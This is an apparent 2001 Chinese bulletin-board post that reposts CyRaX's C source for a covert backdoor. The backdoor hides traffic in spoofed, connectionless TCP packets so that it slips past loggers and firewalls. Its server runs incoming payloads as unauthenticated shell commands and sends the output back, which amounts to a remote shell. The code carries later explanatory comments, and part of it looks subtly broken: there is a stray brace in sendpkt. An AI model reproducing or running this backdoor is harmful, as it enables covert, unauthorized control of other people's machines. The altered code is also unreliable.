<hr><p align="left"><small>发信人: scz (小四), 信区: Security WWW-POST <br>
标 题: 一个很不错的想法(tcp后门) <br>
发信站: 武汉白云黄鹤站 (Wed May 23 10:33:10 2001) , 转信 <br>
<br>
以前只想着icmp tunnel了。 <br>
<br>
/* Backdoor over non connected and spoofed tcp packets <br>
* Coded by |CyRaX| <br>
* Members Of Packets Knights Crew <br>
* www.programmazione.it/knights <br>
* This little backdoor works by sending data in tcp packets over tcp <br>
packets <br>
* without creating a connection. Simply we use the tcp that is a connection <br>
* oriented protocol as udp (connection less). <br>
* Why to do this : <br>
* - tcp loggers simpy log only the connection request <br>
* - firewalls can't block packets all the packets destinated to a port >= <br>
* 1024.. they logs only the packets with the SYN flag... but we don't <br>
* need it :) <br>
* Why this is better than backdoor over icmp or igmp : because a good admin <br>
* would simply blocks (or at least log) all those packets. But it's very <br>
hard <br>
* that he'll blocks all the tcp packets (or log them all) <br>
* Edit this code as you want (and correct all the bugs :P) <br>
*/ <br>
<br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <sys/socket.h> <br>
#include <netinet/tcp.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/in.h> <br>
#include <sys/ioctl.h> <br>
#include <sys/types.h> <br>
#include <net/if.h> <br>
<br>
/* USER SETUP <br>
* ports must be the same in the client and the server <br>
*/ <br>
/* Fixed, compiled-in ports: the server sends SERVERPORT->CLIENTPORT and the <br>
 * client CLIENTPORT->SERVERPORT (see sendpkt()); waitpkt() accepts a segment <br>
 * only when its destination port matches the side it runs on. Being constants, <br>
 * they are a static characteristic of this particular sample. */ <br>
#define CLIENTPORT 1234 <br>
#define SERVERPORT 4321 <br>
<br>
/* Prototypes */ <br>
void uso(); <br>
void waitpkt(); <br>
void sendpkt(char *what, unsigned long int to); <br>
u_short in_chksum(u_short *ptr, int nbytes); <br>
/* Globals: */ <br>
/* server: 1 when started with "-s", 0 in client mode. */ <br>
int server=0; <br>
/* victim: dotted-quad target address copied from argv[2] (client mode only). */ <br>
char victim[20]; <br>
/* wait: client loop flag; cleared by waitpkt() when END_OF_PROCESS arrives. */ <br>
int wait=1; <br>
/* sock_waiting: raw TCP socket opened in main() and read by waitpkt(). */ <br>
int sock_waiting; <br>
/* ourip: the client's own address (argv[3]); sendpkt() stores it in tcp.seq. */ <br>
char ourip[200]; <br>
<br>
/* some structs */ <br>
/* Buffer layout shared by sendpkt() and waitpkt(): IP header, TCP header, <br>
 * 12 bytes that sendpkt() counts in ip_len / the sendto() length but never <br>
 * writes (they stay zero from memset; presumably room for TCP options), then <br>
 * the payload. On receive, data is NUL-terminated only because the whole <br>
 * struct is zeroed before recvfrom(). */ <br>
struct ippkt{ <br>
struct ip ip; <br>
struct tcphdr tcp; <br>
char something[12]; <br>
char data[1024]; <br>
}; <br>
<br>
/* TCP pseudo-header that sendpkt() copies in front of the TCP header when it <br>
 * computes tcp.check. `lenght` (author's spelling, kept as an identifier) <br>
 * holds the TCP length in network byte order. */ <br>
struct pseudohdr { <br>
u_int32_t saddr; <br>
u_int32_t daddr; <br>
u_int8_t zero; <br>
u_int8_t protocol; <br>
u_int16_t lenght; <br>
}; <br>
<br>
/* Let's go !! :) */ <br>
<br>
/* Entry point. argv[1] containing "-s" selects server mode; anything else is <br>
 * client mode, in which argv[2] (target address) and argv[3] (the client's <br>
 * own address, later carried in the TCP sequence field) are copied with no <br>
 * argc check. Both modes open a raw socket for IP protocol 6 (TCP), which on <br>
 * Linux needs CAP_NET_RAW, i.e. the program only works when run privileged. <br>
 * The local `pkt` is declared but never used. */ <br>
int main(int argc, char **argv){ <br>
pid_t procid; <br>
struct ippkt pkt; <br>
char command[200]; <br>
<br>
<br>
/* rand() is used only for the IP identification field in sendpkt(). */ <br>
srand(getpid()); <br>
if(argc<2){ <br>
uso(); <br>
exit(0); <br>
} <br>
if (strstr(argv[1],"-s")){ <br>
server=1; <br>
} <br>
else { <br>
/* victim is 20 bytes and ourip 200; neither copy is length-checked. */ <br>
strcpy(victim,argv[2]); <br>
strcpy(ourip,argv[3]); <br>
} <br>
/* Raw socket read by waitpkt(); it receives copies of incoming TCP <br>
 * segments and waitpkt() filters them by destination port and flags. */ <br>
sock_waiting=socket(AF_INET,SOCK_RAW,6); <br>
printf("Backdoor on non connected/spoofed tcp. Coded by |CyRaX|. <br>
cyrax@freemail.it\n"); <br>
printf("Members of Packets Knights Crew ! <br>
www.programmazione.it/knights\n"); <br>
if(server){ <br>
printf("Running in server mode. Forking and waiting for the data\n"); <br>
/* Detach: the parent exits and the child loops in waitpkt() forever. */ <br>
procid=fork(); <br>
if(procid!=0){ <br>
/* The parent dies. */ <br>
exit(0); <br>
} <br>
while(1){ <br>
waitpkt(); <br>
} <br>
} <br>
else { <br>
printf("Running in client mode. Sending data to %s.\n",victim); <br>
/* Interactive loop: read one line, send it, then keep receiving until <br>
 * waitpkt() sees the END_OF_PROCESS marker and clears `wait`. */ <br>
while(1){ <br>
printf("root@fucked.%s # ",victim); <br>
fgets(command,200,stdin); <br>
wait=1; <br>
sendpkt(command,inet_addr(victim)); <br>
while(wait){ <br>
waitpkt(); <br>
} <br>
} <br>
<br>
<br>
} <br>
<br>
} <br>
<br>
/* Functions that wait for packets */ <br>
/* Receives one segment from sock_waiting and dispatches it on the destination <br>
 * port and the ACK/URG bits (both must be clear). Server side: the payload is <br>
 * handed to popen() as a shell command with no authentication of the sender, <br>
 * and each output line followed by an END_OF_PROCESS marker is sent back to <br>
 * the address found in the segment's sequence field. Client side: the payload <br>
 * is printed, or `wait` is cleared when the marker arrives. The recvfrom() <br>
 * result (howmany) and the popen() result are used without being checked. */ <br>
void waitpkt(){ <br>
struct ippkt pkt; <br>
int howmany; <br>
struct sockaddr_in sin; <br>
int clen=sizeof(sin); <br>
FILE *job; <br>
char buff[200]; <br>
/* Zeroing first is what keeps pkt.data NUL-terminated for short segments. */ <br>
memset(&pkt,0,sizeof(struct ippkt)); <br>
howmany=recvfrom(sock_waiting,(struct ippkt *) &pkt,sizeof(pkt),0,(struct <br>
sockaddr *)&sin,&clen); <br>
if(ntohs(pkt.tcp.dest)==SERVERPORT && pkt.tcp.ack==0 && <br>
pkt.tcp.urg==0&&server){ <br>
/* Received bytes run as a shell command; output goes back line by line. */ <br>
job=popen(pkt.data,"r"); <br>
while(fgets(buff,199,job)!=0){ <br>
sendpkt(buff,pkt.tcp.seq); <br>
} <br>
strcpy(buff,"END_OF_PROCESS"); <br>
pclose(job); <br>
sendpkt(buff,pkt.tcp.seq); <br>
} <br>
if(ntohs(pkt.tcp.dest)==CLIENTPORT && pkt.tcp.ack==0 && <br>
pkt.tcp.urg==0&&!server){ <br>
wait=1; <br>
if(strstr(pkt.data,"END_OF_PROCESS")){ <br>
wait=0; <br>
} <br>
else{ <br>
printf("%s",pkt.data); <br>
} <br>
} <br>
<br>
<br>
} <br>
<br>
/* Functions that sends packets */ <br>
<br>
/* Builds one IP+TCP segment on a fresh IPPROTO_RAW socket with IP_HDRINCL and <br>
 * sends it to `to`, a network-order IPv4 address used both as ip_dst and as <br>
 * the sockaddr. The IP source is a hard-coded third-party address (spoofed), <br>
 * so the real sender is not in the IP header; the TCP sequence field carries <br>
 * an out-of-band value instead: the constant 666 from the server and <br>
 * inet_addr(ourip) from the client. ACK and URG stay clear so that waitpkt() <br>
 * on the peer accepts the segment. `what` must be NUL-terminated; it is <br>
 * copied into pkt.data (1024 bytes) with strcpy, and callers pass at most 200 <br>
 * bytes. Neither the socket nor the tosum buffer is released on return; the <br>
 * locals temp, s and ifr are unused. */ <br>
void sendpkt(char *what, unsigned long int to){ <br>
int sock; <br>
struct sockaddr_in from,temp; <br>
struct ippkt pkt; <br>
int hincl=1; <br>
int err; <br>
int s; <br>
struct ifreq ifr; <br>
struct pseudohdr psd; <br>
char *tosum; <br>
<br>
<br>
sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW); <br>
memset(&pkt,0,sizeof(pkt)); <br>
/* IP_HDRINCL: the kernel sends the IP header exactly as built below. */ <br>
setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&hincl,sizeof(hincl)); <br>
from.sin_addr.s_addr=to; <br>
from.sin_family=AF_INET; <br>
/* Length counts the 12-byte `something` field even though it is left zero. */ <br>
pkt.ip.ip_len=sizeof(struct ip)+sizeof(struct tcphdr)+12+strlen(what); <br>
pkt.ip.ip_hl=sizeof(pkt.ip)>>2; <br>
pkt.ip.ip_v=4; <br>
pkt.ip.ip_ttl=255; <br>
pkt.ip.ip_tos=0; <br>
pkt.ip.ip_off=0; <br>
pkt.ip.ip_id=htons((int)rand()); <br>
pkt.ip.ip_p=6; <br>
/* from www.microsoft.com .. you BETTER change this */ <br>
pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137"); <br>
pkt.ip.ip_dst.s_addr=to; <br>
pkt.ip.ip_sum=in_chksum((u_short *) &pkt.ip,sizeof(struct ip)); <br>
if(server){ <br>
pkt.tcp.source=htons(SERVERPORT); <br>
pkt.tcp.dest=htons(CLIENTPORT); <br>
} <br>
else{ <br>
pkt.tcp.source=htons(CLIENTPORT); <br>
pkt.tcp.dest=htons(SERVERPORT); <br>
} <br>
/* The sequence number is (ab)used as a data field, see the header comment. */ <br>
if(server){ <br>
pkt.tcp.seq=666; <br>
} <br>
} <br>
else{ <br>
pkt.tcp.seq=inet_addr(ourip); <br>
<br>
} <br>
/* SOME FLAGS */ <br>
pkt.tcp.ack=0; <br>
pkt.tcp.urg=0; <br>
pkt.tcp.window=1234; <br>
<br>
strcpy(pkt.data,what); <br>
pkt.tcp.urg_ptr=1234; <br>
/* MAYBE SOMETHING IS WRONG HERE */ <br>
/* Pseudo-header + TCP header are copied into a heap buffer for checksumming. */ <br>
tosum=malloc(sizeof(psd)+sizeof(pkt.tcp)); <br>
memcpy(&psd.saddr,&pkt.ip.ip_src.s_addr,4); <br>
memcpy(&psd.daddr,&pkt.ip.ip_dst.s_addr,4); <br>
psd.protocol=6; <br>
psd.lenght=htons(sizeof(struct tcphdr)+12+strlen(what)); <br>
memcpy(tosum,&psd,sizeof(psd)); <br>
memcpy(tosum+sizeof(psd),&pkt.tcp,sizeof(pkt.tcp)); <br>
pkt.tcp.check=in_chksum((u_short *)&tosum,sizeof(psd)+sizeof(pkt.tcp)); <br>
/* PACKET READY TO GO !!!!!! */ <br>
/* err is assigned but never examined. */ <br>
err=sendto(sock,&pkt,sizeof(struct ip)+sizeof(struct <br>
tcphdr)+sizeof(pkt.something)+strlen(what), <br>
0,(struct sockaddr *)&from,sizeof(struct sockaddr)); <br>
} <br>
<br>
/* Function for the cksum.. ripped */ <br>
<br>
/*
 * Internet checksum over nbytes bytes starting at ptr.
 *
 * Sums the data as 16-bit words (host byte order) into a 32-bit-or-wider
 * accumulator, adds a trailing odd byte as the low-addressed byte of a zeroed
 * 16-bit word, folds the carries out of the top 16 bits back into the low 16,
 * and returns the ones' complement truncated to 16 bits. nbytes <= 0 yields
 * 0xFFFF. ptr must be suitably aligned for u_short reads.
 */
u_short in_chksum(u_short *ptr, int nbytes)
{
	unsigned long acc = 0;
	int remaining = nbytes;

	/* Whole 16-bit words. */
	for (; remaining > 1; remaining -= 2) {
		acc += *ptr++;
	}

	/* Trailing byte, if the length is odd: placed in the first byte of a
	 * zeroed word, so the result depends on host endianness as before. */
	if (remaining == 1) {
		u_short last = 0;
		memcpy(&last, ptr, 1);
		acc += last;
	}

	/* Fold the carries into 16 bits (twice, since the first fold can carry). */
	acc = (acc >> 16) + (acc & 0xffff);
	acc += acc >> 16;

	return (u_short)~acc;
}
<br>
<br>
/* Prints the banner and usage text, then exits with status 0. Called from <br>
 * main() when fewer than two arguments are given ("uso" is Italian for <br>
 * "usage"). Note the usage line shows "-c" for the client, but main() treats <br>
 * any first argument not containing "-s" as client mode. */ <br>
void uso(){ <br>
printf("Backdoor On Non Connected And Spoofed Tcp Packets\n"); <br>
printf("Coded by |CyRaX| cyrax@freemail.it - |CyRaX|@ircnet\n"); <br>
printf("Member Of Packets Knights Crew ! <br>
www.programmazione.it/knights\n"); <br>
printf("Usage: server ./tcpb -s\n"); <br>
printf(" client ./tcpb -c <serverip> <your_ip>\n"); <br>
printf("example : ./tcpb -s ; /tcpb -c 127.0.0.1 127.0.0.1\n"); <br>
<br>
exit(0); <br>
} <br>
<br>
<br>
<br>
<br>
<br>
-- <br>